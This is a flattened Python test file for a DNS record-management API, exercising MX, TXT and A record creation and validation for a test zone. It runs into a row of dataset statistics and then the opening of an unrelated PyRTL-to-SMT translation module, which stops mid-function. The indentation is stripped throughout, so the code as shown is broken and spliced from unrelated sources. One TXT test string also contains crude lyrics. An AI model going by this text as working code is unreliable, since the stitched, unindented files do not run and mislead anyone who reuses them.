res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
## EDIT DATA
res = test_data.edit_ttldata(client,id_ttldata,'402428102489735169',id_record,headers)
assert res.status_code == 200
res = test_data.edit_content_data(client,id_content,id_record,'bvrtan.wetestzone.xyz.',headers)
assert res.status_code == 200
new_data = {
"nm_record" : "test",
"id_type" : "402427533112147969",
"id_zone": id_zone,
"date_record": "20190707"
}
res = test_data.edit_record(client,id_record,new_data,headers)
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_value,record_type)
test_data.teardown_record(client,id_record,headers)
test_data.teardown(client,headers)
self.testset.remove(test_data)
def test_mx(self,client,get_header):
record_type = 'mx'
priority = '10'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
########## hostname : @ , content: wetestzone.xyz
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'wetestzone.xyz'
expected_content_serial = priority + ' wetestzone.xyz.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
############## hostname : wetestzone.xyz , content : wetestzone.xyz.
hostname = 'wetestzone.xyz'
expected_hostname = 'wetestzone.xyz.wetestzone.xyz.'
content_serial = 'wetestzone.xyz.'
expected_content_serial = priority + ' wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : www , content: @
hostname = 'www'
expected_hostname = 'www.wetestzone.xyz.'
content_serial = '@'
expected_content_serial = priority + ' wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : a.b.c content: mail.google.com
hostname = 'a.b.c'
expected_hostname = 'a.b.c.wetestzone.xyz.'
content_serial = 'mail.google.com'
expected_content_serial = priority + ' mail.google.com.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : A-0c content: mail.google.com.
hostname = 'A-0c'
expected_hostname = 'a-0c.wetestzone.xyz.'
content_serial = 'mail.google.com.'
expected_content_serial = priority + ' mail.google.com.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
##### hostname : 0--0 content: mail.google.com.
hostname = '0--0'
expected_hostname = '0--0.wetestzone.xyz.'
content_serial = 'mail.google.com.'
expected_content_serial = priority + ' mail.google.com.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
########## hostname : @ , content: store.cobadns08.xyz.
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'store.wetestzone.xyz.'
expected_content_serial = priority + ' store.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
# ########## hostname : @ , content: abc.wetestzone.xyz
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'abc.wetestzone.xyz'
expected_content_serial = priority + ' abc.wetestzone.xyz.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
# ########## hostname : @ , content: a.b.c.wetestzone.xyz
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'abc.wetestzone.xyz.'
expected_content_serial = priority + ' abc.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
# ########## hostname : @ , content: mail
# hostname_ = '@'
# expected_hostname = 'wetestzone.xyz.'
# content_value = 'mail'
# expected_content_value = 'mail.wetestzone.xyz.'
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'mail'
expected_content_serial = priority + ' mail.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
# ########## hostname : @ , content: A-0c
# hostname_ = '@'
# expected_hostname = 'wetestzone.xyz.'
# content_value = 'A-0c'
# expected_content_value = 'a-0c.wetestzone.xyz.'
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'A-0c'
expected_content_serial = priority + ' a-0c.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
# ########## hostname : @ , content: o12345670123456701234567012345670123456701234567012345670123456
# hostname_ = '@'
# expected_hostname = 'wetestzone.xyz.'
# content_value = 'o12345670123456701234567012345670123456701234567012345670123456'
# expected_content_value = 'o12345670123456701234567012345670123456701234567012345670123456.wetestzone.xyz.'
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'o12345670123456701234567012345670123456701234567012345670123456'
expected_content_serial = priority + ' o12345670123456701234567012345670123456701234567012345670123456.wetestzone.xyz.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
### TEST VIEW_ALL
d = {"view_all":{"tags":{"id_record": ""}}}
res = test_data.post_data(client,'record',d,headers)
d = {"view_all":{"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'record',d,headers)
# ########## FAILURE hostname : @ , content: -A0c
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = '-A0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
# ########## FAILURE hostname : @ , content: A0c-
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = '-A0c-'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
# ########## FAILURE hostname : @ , content: A.-0c
# hostname_ = '@'
# expected_hostname = 'wetestzone.xyz.'
# content_value = 'A.-0c'
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'A.-0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
# ########## FAILURE hostname : @ , content: A-.0c
# hostname_ = '@'
# expected_hostname = 'wetestzone.xyz.'
# content_value = 'A-.0c'
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'A-.0c'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
# ########## FAILURE hostname : @ , content: o123456701234567012345670123456701234567012345670123456701234567
# hostname_ = '@'
# expected_hostname = 'wetestzone.xyz.'
# content_value = 'o123456701234567012345670123456701234567012345670123456701234567'
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_serial = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial_fail(client,content_serial,id_record,headers)
########## FAILURE hostname : www.
hostname_ = 'www.'
expected_hostname = 'wetestzone.xyz.'
content_value = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : mail.cobadns08.xyz.
hostname_ = 'mail.cobadns08.xyz.'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : *
hostname_ = '*'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : -A0c
hostname_ = '-A0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A0c-
hostname_ = '-A0c-'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A.-0c
hostname_ = 'A.-0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : A-.0c
hostname_ = 'A-.0c'
res = test_data.add_error_record(client,hostname_,record_type,headers)
########## FAILURE hostname : o123456701234567012345670123456701234567012345670123456701234567
hostname_ = 'o123456701234567012345670123456701234567012345670123456701234567'
res = test_data.add_error_record(client,hostname_,record_type,headers)
##### hostname : A-1c content: mail.google.com.
hostname = 'A-1c'
expected_hostname = 'a-1c.wetestzone.xyz.'
content_serial = 'mail.google.com.'
expected_content_serial = priority + ' store.google.com.'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,priority,id_record,headers)
res = test_data.add_content_serial(client,content_serial,id_record,headers)
id_content_serial = res['id_content_serial']
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
## EDIT
new_content = "store.google.com."
res = test_data.edit_serial_data(client,headers,id_content_serial,id_record,new_content)
assert res.status_code == 200
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
tmp = json.loads(res.data.decode('utf8'))
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content_serial,record_type)
test_data.teardown(client,headers)
self.testset.remove(test_data)
@pytest.mark.skip()
def test_validation_txt(self,client,get_header):
record_type = 'txt'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "agus agus"
expected_content = '"agus agus"'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "agus'agus"
expected_content = '''"agus'agus"'''
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = """agus"agus"""
expected_content = '''"agus\\"agus"'''
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = '"'
expected_content = '''"\\""'''
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "'"
expected_content = '"\'"'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = 'Tripping off the beat kinda, dripping off the meat grinder Heat niner, pimping, stripping, soft sweet minor China was a neat signer, trouble with the script Digits double dipped, bubble lipped, subtle lisp midget Borderline schizo, sort of fine tits though'
expected_content = '"{}" "{}"'.format(content[:255].lower(),content[255:].lower())
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = '£'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
test_data.teardown(client,headers)
self.testset.remove(test_data)
def test_validation_a(self,client,get_header):
record_type = 'a'
headers = get_header
test_data = DataTest()
self.testset.append(test_data)
res = test_data.add_zone(client,"wetestzone.xyz",headers)
assert res.status_code == 200
###### hostname : @, content : agus agus
hostname = '@'
expected_hostname = 'wetestzone.xyz.'
content = "192.168.1.1"
expected_content = '192.168.1.1'
res = test_data.add_record(client,hostname,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data(client,content,id_record,headers)
data = {"zone-insert": {"tags":{"id_record": id_record}}}
res = test_data.post_data(client,'sendcommand',data,headers)
res = json.loads(res.data.decode('utf8'))
# ZONE READ
id_zone = test_data.identity['zone']['id_zone']
data = {"zone-read" : {"tags":{"id_zone": id_zone}}}
res = test_data.post_data(client,'sendcommand',data,headers)
nm_zone = test_data.identity['zone']['nm_zone']
respons = self.assert_hostname(res,expected_hostname,nm_zone)
self.assert_value(respons,expected_content,record_type)
test_data.teardown_record(client,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'localhost'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = 'sembarangan'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
## TEST FAIL
hostname_ = '@'
expected_hostname = 'wetestzone.xyz.'
content_value = '270.0.0.2'
res = test_data.add_record(client,hostname_,record_type,headers)
assert res.status_code == 200
res = json.loads(res.data.decode('utf8'))
id_record = res['message']['id']
res = test_data.add_content_data_fail(client,content_value,id_record,headers)
test_data.teardown(client,headers)
self.testset.remove(test_data)
def test_validation_teardown(self,client,get_header):
headers = get_header
test_data = self.testset
if len(test_data) > 0:
for i in test_data:
try:
i.teardown(client,headers)
except Exception :
pass
| 43.428383 | 276 | 0.626212 | 7,874 | 65,794 | 4.978918 | 0.025273 | 0.065912 | 0.059484 | 0.048566 | 0.925849 | 0.91631 | 0.89848 | 0.886721 | 0.882002 | 0.868126 | 0 | 0.036095 | 0.230675 | 65,794 | 1,514 | 277 | 43.457067 | 0.738408 | 0.068578 | 0 | 0.790503 | 0 | 0.000931 | 0.144133 | 0.01939 | 0 | 0 | 0 | 0 | 0.121043 | 1 | 0.022346 | false | 0.000931 | 0.002793 | 0 | 0.042831 | 0.001862 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a26e2c8a1b988f9bf5e1d8ad0f4ff667299d835 | 46,270 | py | Python | pyrtl/symbolic/tosmt.py | zou-sheng/PyRTL | c8d671c632126df173d6976830598a69ce37cc53 | [
"BSD-3-Clause"
] | null | null | null | pyrtl/symbolic/tosmt.py | zou-sheng/PyRTL | c8d671c632126df173d6976830598a69ce37cc53 | [
"BSD-3-Clause"
] | null | null | null | pyrtl/symbolic/tosmt.py | zou-sheng/PyRTL | c8d671c632126df173d6976830598a69ce37cc53 | [
"BSD-3-Clause"
] | null | null | null | import z3
import tempfile
import random
from ..wire import Input, Output, Register, Const, WireVector
from ..fuzz.aflMutators import int2bin
from ..core import Block
from ..memory import RomBlock, MemBlock
def transfer_to_bin(value, bitwidth):
return "#b" + int2bin(value, bitwidth)
def translate_to_smt(block, output_file, circle=1, rom_blocks=None):
consts = dict()
for wire in list(block.wirevector_subset()):
if type(wire) == Const:
# some const is in the form like const_0_1'b1, is this legal operation?
wire.name = wire.name.split("'").pop(0)
consts[wire.name] = wire
Declare = []
# write "Main"
# node_cntr = 0
initializedMem = []
##################################6/2
# if there are rom blocks, need to be initialized
if rom_blocks is not None:
for x in rom_blocks:
if x.name not in initializedMem:
initializedMem.append(x.name)
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (x.name, x.addrwidth, x.bitwidth))
# if rom data is a function, calculate the data first
if callable(x.data):
romdata = [x.data(i) for i in range(2 ** x.addrwidth)]
x.data = romdata
# write rom block initialization data
for i in range(len(x.data)):
output_file.write("(assert (= (store %s %s %s) %s))\n" % (x.name, transfer_to_bin(i, x.addrwidth), transfer_to_bin(x.data[i], x.bitwidth), x.name))
##################################
if circle == 1:
for log_net in list(block.logic_subset()):
if log_net.op == '&':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvand %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == '|':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvor %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == '^':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
